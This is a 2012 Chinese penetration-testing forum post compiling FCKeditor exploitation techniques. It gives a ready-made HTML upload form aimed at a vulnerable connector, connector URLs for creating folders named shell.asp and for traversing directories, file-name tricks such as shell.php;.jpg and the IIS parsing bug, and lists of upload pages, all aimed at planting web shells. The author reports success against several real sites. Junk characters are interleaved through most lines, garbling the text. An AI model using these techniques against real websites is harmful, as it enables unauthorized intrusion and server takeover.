找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 Fckeditor漏洞 (2)
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2346|回复: 0
打印 上一主题 下一主题

Fckeditor漏洞 (2)

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-13 17:01:39 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Fckeditor漏洞利用总结  * b6 [7 J. e- e' t9 L' E4 Y
查看编辑器版本" s1 ?$ }) I8 X: C6 b6 Z+ T4 }
FCKeditor/_whatsnew.html
2 }* k6 P* M4 ]. V: c—————————————————————————————————————————————————————————————% ?& T4 W# ^& F6 ^$ d3 `* I

. d) K: J* }# |2. Version 2.2 版本
  k7 o8 L& @; f  }: h" n( WApache+linux 环境下在上传文件后面加个.突破!测试通过。8 n5 J8 {; ~  K1 i( a0 t
—————————————————————————————————————————————————————————————) A% i/ K7 f: e
% j2 ^2 T. T' g9 I, W
3.Version <=2.4.2 For php 在处理PHP 上传的地方并未对Media 类型进行上传文件类型的控制,导致用户上传任意文件!将以下保存为html文件,修改action地址。' L" D0 K: T8 T8 J- A2 M  @
<form id="frmUpload" enctype="multipart/form-data"
+ b6 W, U7 V; Paction="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>& X! r$ x/ H) Y4 a  A* y+ U
<input type="file" name="NewFile" size="50"><br>' C% b: ~' q* i: V: ~" ?1 O
<input id="btnUpload" type="submit" value="Upload">
0 Q5 t6 \0 P' Y</form># I/ w* [6 `. U$ v  H! l; }
—————————————————————————————————————————————————————————————
  G" a5 t$ r1 l+ n9 ]: s* |# {
) l6 t9 l; H8 t) k; w4.FCKeditor 文件上传“.”变“_”下划线的绕过方法3 o* \( P9 m+ B: ~
        很多时候上传的文件例如:shell.php.rar 或shell.php;.jpg 会变为shell_php;.jpg 这是新版FCK 的变化。
" C4 o2 _5 G  N5 ^8 q, R) ]    4.1:提交shell.php+空格绕过
1 b' f! B$ W8 Y. Q1 x2 L7 Z- W9 I不过空格只支持win 系统 *nix 是不支持的[shell.php 和shell.php+空格是2 个不同的文件 未测试。
: |8 u; w2 @# B/ h    4.2:继续上传同名文件可变为shell.php;(1).jpg 也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。
, ~  w  r+ a% w7 }+ y+ ^2 i$ k—————————————————————————————————————————————————————————————
! W. d" G: o+ B* [8 G' C# v6 ]2 ]& @  O
5. 突破建立文件夹; t- n  t+ O3 [# D; M, h6 k
FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684
' ]6 f  j+ x% j$ x& Z, dFCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp
" H. i' A% ]: V( `# ?—————————————————————————————————————————————————————————————. l6 D) Q- K" {" J1 e

1 g  b; u1 u* Y" B6 v. Q6. FCKeditor 中test 文件的上传地址
( `4 u8 b% H# C# d! _FCKeditor/editor/filemanager/browser/default/connectors/test.html
  @' J7 K$ f, HFCKeditor/editor/filemanager/upload/test.html
% Q7 i' i2 W6 ]- c/ V* U. iFCKeditor/editor/filemanager/connectors/test.html
3 q5 K* _, T9 ~% q$ m+ V/ I. E' WFCKeditor/editor/filemanager/connectors/uploadtest.html
. t% y( F) x, }- i; i% T$ i1 e' `1 b—————————————————————————————————————————————————————————————
1 N  U9 D9 q0 C  i1 P$ k1 l0 m3 s/ V
0 m% R, D  ?  _5 {! a7.常用上传地址0 [% @/ p  {4 L/ L
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/4 x" X% D. f/ g$ [6 `, o
FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp4 l, I9 @9 U( E9 j5 O8 U
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php (ver:2.6.3 测试通过)5 v, h; H. {. U4 F% N
JSP 版:
6 ^- V$ E! o/ s- \& O7 {& Q: ~FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp1 k4 A* d: R5 c- G6 [  J
注意红色部分修改为FCKeditor 实际使用的脚本语言,蓝色部分可以自定义文
% n7 Q, n/ R. u; f$ }件夹名称也可以利用../..目录遍历,紫色部分为实际网站地址。
' @- o' b) z2 |# T% Q2 N—————————————————————————————————————————————————————————————4 U: b# a. C& E
& B% c8 A' K  a2 ^$ R
8.其他上传地址
" _! C: S$ b' E$ N# WFCKeditor/_samples/default.html
! [2 C! i8 C- p# M) B0 ZFCKeditor/_samples/asp/sample01.asp
1 l* ]+ m4 v2 A6 n4 GFCKeditor/_samples/asp/sample02.asp* C  C3 P1 H6 O$ |1 p  A& ^0 ]
FCKeditor/_samples/asp/sample03.asp& V2 V/ G, |$ X; y# s& j7 f
FCKeditor/_samples/asp/sample04.asp6 k0 q4 J. Q6 ^% l, G
一般很多站点都已删除_samples 目录,可以试试。
1 T; M, p3 @# W$ x9 v- a; MFCKeditor/editor/fckeditor.html 不可以上传文件,可以点击上传图片按钮再选择浏览服务器即可跳转至可上传文件页。$ i5 ?9 J" o. Z6 s* w
—————————————————————————————————————————————————————————————& @& H9 C( |! J) o6 k

/ Q1 Y) V) \3 u9.列目录漏洞也可助找上传地址
; m# e% }$ i! ]# tVersion 2.4.1 测试通过
! X' w% m5 g1 u4 U8 a" s1 M修改CurrentFolder 参数使用 ../../来进入不同的目录: ?3 c5 {* N; ~! }5 `# s7 I5 g
/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=shell.asp9 c4 A0 Y6 y5 \
根据返回的XML 信息可以查看网站所有的目录。& R" q8 T. A1 j5 g0 {& p4 ~
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F
' I' c. J# f7 q5 J5 z8 e( j! A; J也可以直接浏览盘符:- q, s9 Y+ Z5 F
JSP 版本:1 o% v. r. O' \) M6 c
FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F9 W$ H8 d! u, n
—————————————————————————————————————————————————————————————4 q( K! W! i. u$ P0 n: {' z9 Z
7 I  t, [- }  a) O
10.爆路径漏洞
! f; g/ ?/ T3 @$ BFCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp9 _, T. z/ c% [3 s+ ^
—————————————————————————————————————————————————————————————. g! D  A; s2 f* V# k$ P
; }0 m% @7 g6 W4 B7 f; b# P% r
11. FCKeditor 被动限制策略所导致的过滤不严问题# |! c0 h% C- c, o
        影响版本: FCKeditor x.x <= FCKeditor v2.4.3
( W% s- D; X0 u, x脆弱描述:, [9 l& B7 _- C$ B5 f
FCKeditor v2.4.3 中File 类别默认拒绝上传类型:
& E! l5 v6 w: [! a/ rhtml|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm
7 ]# t% O+ N4 j7 W, x7 cFckeditor 2.0 <= 2.2 允许上传asa、cer、php2、php4、inc、pwml、pht 后缀的文件上传后它保存的文件直接用的$sFilePath = $sServerDir . $sFileName,而没有使用$sExtension 为后缀.直接导致在win 下在上传文件后面加个.来突破[未测试]!
1 W3 [& b; \* O% \) a        而在apache 下,因为"Apache 文件名解析缺陷漏洞"也可以利用之,另建议其他上传漏洞中定义TYPE 变量时使用File 类别来上传文件,根据FCKeditor 的代码,其限制最为狭隘。
8 r" K) A4 a7 I' V  V; \# Q        在上传时遇见可直接上传脚本文件固然很好,但有些版本可能无法直接上传可以利用在文件名后面加.点或空格绕过,也可以利用2003 解析漏洞建立xxx.asp文件夹或者上传xx.asp;.jpg!
5 E" r% a) w9 G& Q) R—————————————————————————————————————————————————————————————
& g  g  |) `2 P% _8 c
& a9 Y2 `4 Y% J12.最古老的漏洞,Type文件没有限制!
; g; @- e- C8 C# o, i        我接触到的第一个fckeditor漏洞了。版本不详,应该很古老了,因为程序对type=xxx 的类型没有检查。我们可以直接构造上传把type=Image 改成Type=hsren 这样就可以建立一个叫hsren的文件夹,一个新类型,没有任何限制,可以上传任意脚本! + A+ m2 I1 U# K% k5 C7 m9 _
—————————————————————————————————————————————————————————————
: i3 R* c% u9 s: S0 d6 A! X; w1 z& k% r1 |
===============================================================================================================================================
5 \  |5 ^& i3 R7 `$ H  j/ l
# Y3 Y  M( G* S# I2 W0 zFCK编辑器jsp版本漏洞:/ c& p! S. Z* _1 m5 k8 W
8 A% A+ F; s% Z5 C7 X/ N9 y" B

7 ~& I0 s- }- L9 I" ~3 Q3 ]6 Fhttp://www.xxx.com/fckeditor/edi ... p;CurrentFolder=%2F
& b, y" k: Y& ], y& O( q
2 p% a. L: m% B. k2 X上传马所在目录6 ^5 [, \8 e" _3 m: e
FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
! V; Q" e7 W$ I# o' r+ Z上传shell的地址:
( f  L# v: {2 l, {1 A) e9 k7 u8 ?http://www.xxx.com/fckeditor/edi ... ctors/jsp/connector2 _) y" F' I: R4 M- N4 s
跟版本有关系.并不是百分百成功. 测试成功几个站.5 n3 Y8 u6 [# E5 V1 Q) z- O
不能通杀.很遗憾./ n% S( a/ @* M" h
http://www.****.com/FCKeditor/editor/filemanager/browser/default/browser.html?type=File&connector=connectors/jsp/connector
* F# W& }! K2 ~$ j7 l/ e0 N# E如果以上地址不行可以试试
/ B" h/ S% J3 k5 CFCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=/servlet/Connector
; E+ k" w3 N& d1 D& `+ ?FCKeditor/_samples/  l; @! L6 r+ n' M
FCKeditor/_samples/default.html
# g# Y+ i% S% P- s$ K+ uFCKeditor/editor/fckeditor.htm9 f2 _3 x+ a& F
FCKeditor/editor/fckdialog.html7 ?6 E8 \& G. `. N

  w$ `6 G" q: G4 ?# w+ ]3 o2 l0 l, y2 W0 T( }6 j, V: B

5 L* K4 p6 _8 L; Z' Q, U解析漏洞+未重命名文件时上传漏洞  1.asp;jpg8 y5 g! E* R# j( s1 I0 ?0 G* s
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表